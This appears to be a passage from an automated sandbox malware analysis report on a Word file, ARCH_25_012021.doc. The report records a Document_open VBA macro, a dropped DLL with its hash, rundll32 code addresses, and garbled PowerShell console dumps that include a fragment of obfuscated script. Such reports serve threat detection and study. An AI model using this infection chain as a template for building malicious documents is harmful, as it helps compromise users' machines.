                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E4689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D3E9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E1ED9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E8F18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002ED713
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E7F6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EA746
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002D3F9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E8217
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC014
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F3C07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E923C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F502C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E4C27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FBC21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FD45C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F3856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E9055
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EC652
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EBC63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E8A60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E3E9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FB499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FD099
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F188F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F4689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EC485
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F10BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EC0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E16B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F5CDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F1ED9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F84D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F5AC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E32C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F72F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F32F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FD2EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F10E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F6AE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F04E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F531E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F8F18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FD713
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F893D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E6134
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F6D34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F6934
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FE32D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E5155
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E4152
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FA746
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC340
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E6B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FA972
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F7F6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E2362
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E3F9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E1B9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FB998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E7D8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EED87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EC587
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FE985
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F43BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E65BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E85B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E9DAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E9DAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E73A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F7DA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001ED1A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F7BDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E0BCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E4DCA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EC9C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FB5C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EB5F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DC014
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C8217
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D3C07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C923C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DC83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D502C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C4C27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DBC21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DD45C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C9055
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D3856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CC652
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C8A60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CBC63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C3E9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DB499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DD099
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D188F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D4689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CC485
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D10BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CC0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C16B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D5CDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D1ED9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D84D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D5AC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C32C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D72F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D32F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DD2EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D10E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D6AE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D04E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D531E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D8F18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DD713
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D893D
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C6134
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D6D34
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D6934
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DE32D
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C5155
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C4152
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DA746
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DC340
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C577E
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C6B79
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DA972
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D7F6A
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C2362
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C1B9C
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C3F9F
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DB998
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C7D8A
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DE985
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CED87
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CC587
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D43BF
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C65BF
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C85B3
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C9DAD
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C9DAE
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C73A8
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D7DA5
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CD1A3
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D7BDC
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C0BCC
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C4DCA
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CC9C0
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DB5C0
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CB5F1
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023BC21
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00224C27
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023502C
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0022542D
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023C83F
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0022923C
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00233C07
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00228217
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023C014
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0022BC63
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00228A60
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0022C652
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00233856
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00229055
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023D45C
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002216B2
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0022C0B6
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002310BB
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002360B9
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0022C485
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00234689
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023188F
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023B499
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023D099
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00223E9E
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002304E1
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002310E5
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00236AE4
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023D2EC
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002372F1
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002332F0
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00235AC3
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002232C2
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00231ED9
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002384D9
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00235CDF
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023E32D
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00226134
                      Source: ARCH_25_012021.doc OLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentation OLE, VBA macro: Module A5ate73kc6cw5njy, Function Document_open
                      Source: ARCH_25_012021.doc OLE indicator, VBA macros: true
                      Source: Joe Sandbox View Dropped File: C:\Users\user\Kaktksw\An6othh\N49I.dll D09BACE1490F6EE322262FF2DA373E861F3B3B9BC03C386CE8A031648F1EAA4F
                      Source: N49I.dll.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
                      Source: classification engine Classification label: mal100.troj.evad.winDOC@24/8@1/98
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_007434DF CreateToolhelp32Snapshot,
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$CH_25_012021.doc
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC503.tmp
                      Source: ARCH_25_012021.doc OLE indicator, Word Document stream: true
                      Source: ARCH_25_012021.doc OLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ..%..................................... .........................(.....8.(.............#.........................%.....h.......5kU.......(.....
                      Source: C:\Windows\System32\msg.exeConsole Write: ................T...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......x.(.....L.................(.....
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K......x.].............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j......................u.............}..v....P3......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j..... u...............u.............}..v.....3......0...............x.].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....................#..j......................u.............}..v.....@......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................#..j....X.]...............u.............}..v....@A......0.................].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....#...............s..j......................u.............}..v.....w......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............s..j..... u...............u.............}..v.....x......0...............(.].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....7................/.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7................/.j......................u.............}..v....(.......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....C................/.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C................/.j......................u.............}..v....(.......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....O................/.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O................/.j......................u.............}..v....(.......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v....@.......0................E].....(.......T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[................/.j......................u.............}..v....x.......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.6.2.............}..v............0................E].....$.......T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g................/.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....s................/.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s................/.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v.....%......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@&................u.............}..v.....&......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v.....-......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v.....5......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@6................u.............}..v.....6......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v.....=......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@>................u.............}..v.....>......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v.....E......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@F................u.............}..v.....F......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....'................/.j....@I]...............u.............}..v.....M......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'................/.j....@N................u.............}..v.....N......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....3................/.j....@I]...............u.............}..v.....U......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3................/.j....@V................u.............}..v.....V......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....?................/.j....@I]...............u.............}..v.....]......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?................/.j....@^................u.............}..v.....^......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....K................/.j....@I]...............u.............}..v.....e......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K................/.j....@f................u.............}..v.....f......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....W................/.j....@I]...............u.............}..v.....m......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W................/.j....@n................u.............}..v.....n......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....c................/.j....@I]...............u.............}..v.....u......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c................/.j....@v................u.............}..v.....v......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....o................/.j....@I]...............u.............}..v.....}......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o................/.j....@~................u.............}..v.....~......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....{................/.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{................/.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............Y.'.).}.}.c.a.t.c.h.{.}.}.$.B.5.8.I.=.(.'.O.3.'.+.'.5.I.'.).....0................E].....<.......T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j......................u.............}..v....8.......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j......................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v....h.......0.................%.....r.......T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j.... .................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ......../.j....@I]...............u.............}..v....0.......0................E].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j......................u.............}..v....h.......0................F].............T...............
